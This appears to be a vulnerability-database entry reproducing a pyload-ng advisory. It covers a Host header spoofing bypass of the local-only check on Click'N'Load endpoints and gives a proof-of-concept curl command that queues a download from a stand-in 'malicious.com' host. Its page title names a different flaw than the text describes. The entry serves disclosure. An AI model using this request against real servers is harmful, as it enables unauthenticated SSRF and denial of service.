logo

Database

Missing subresource integrity check In pyload-ng

Description

Improper Authentication and Origin Validation Error in pyload-ng

Summary

A Host Header Spoofing vulnerability in the @local_check decorator allows unauthenticated external attackers to bypass local-only restrictions. This grants access to the Click'N'Load API endpoints, enabling attackers to remotely queue arbitrary downloads, leading to Server-Side Request Forgery (SSRF) and Denial of Service (DoS).

Details

The pyload WebUI provides an API for the Click'N'Load plugin, which is intended to be accessed only from the local machine (e.g., via a browser extension sending requests to localhost:9666). To enforce this, the pyload application uses a @local_check decorator on the relevant routes in src/pyload/webui/app/blueprints/cnl_blueprint.py.

However, the @local_check implementation relies on the user-controlled HTTP_HOST (derived from the HTTP Host header) to verify the origin:

# src/pyload/webui/app/blueprints/cnl_blueprint.py
def local_check(func):
    @wraps(func)
    def wrapper(*args, **kwargs):
        remote_addr = flask.request.environ.get("REMOTE_ADDR", "0")
        http_host = flask.request.environ.get("HTTP_HOST", "0")

        if remote_addr in ("127.0.0.1", "::ffff:127.0.0.1", "::1", "localhost") or http_host in (...

Because http_host is read directly from the Host header of the HTTP request, an external attacker can easily spoof this header (e.g., Host: 127.0.0.1:9666). When this spoofed header is present, the condition http_host in ("127.0.0.1:9666", ...) evaluates to True, completely bypassing the IP address check (remote_addr) and granting access to the protected functions.

The affected routes are:

    /flash/ and /flash/<id>

    /flash/add

    /flash/addcrypted

    /flash/addcrypted2

    /flashgot and /flashgot_pyload

    /flash/checkSupportForUrl

PoC

    Ensure the PyLoad instance is running and accessible externally.

    Ensure the ClickNLoad plugin is enabled in the PyLoad settings (it evaluates to disabled by default).

    Send a POST request to one of the protected endpoints, such as /flash/add, and spoof the Host header to 127.0.0.1:9666.

Example curl command:

curl -i -X POST "http://<pyload-external-ip>:<port>/flash/add" \
     -H "Host: 127.0.0.1:9666" \
     -d "urls=http://malicious.com/payload.bin" \
     -d "package=MaliciousPackage"

    Notice that you receive a success\r\n response instead of a 403 Forbidden. The package and URL will be successfully added to the PyLoad queue.

Impact

This vulnerability allows unauthenticated attackers to interact with the Click'N'Load API. Attackers can arbitrarily add URLs to the download queue, which forces the PyLoad server to make outbound requests to attacker-controlled or internal URLs (SSRF). Attackers can also exhaust the server's storage or bandwidth by queueing massive files (DoS).

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem
Package
Affected version
Patched versions

Aliases

1. CVE-2026-333142. NVD-2026-333143. OSV-2026-333144. GHSA-q485-cg9q-xq2r5. GCVE-2026-33314

References

1. https://github.com/pyload/pyload/security/advisories/GHSA-q485-cg9q-xq2r

Does your application use this vulnerable software?

During the free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.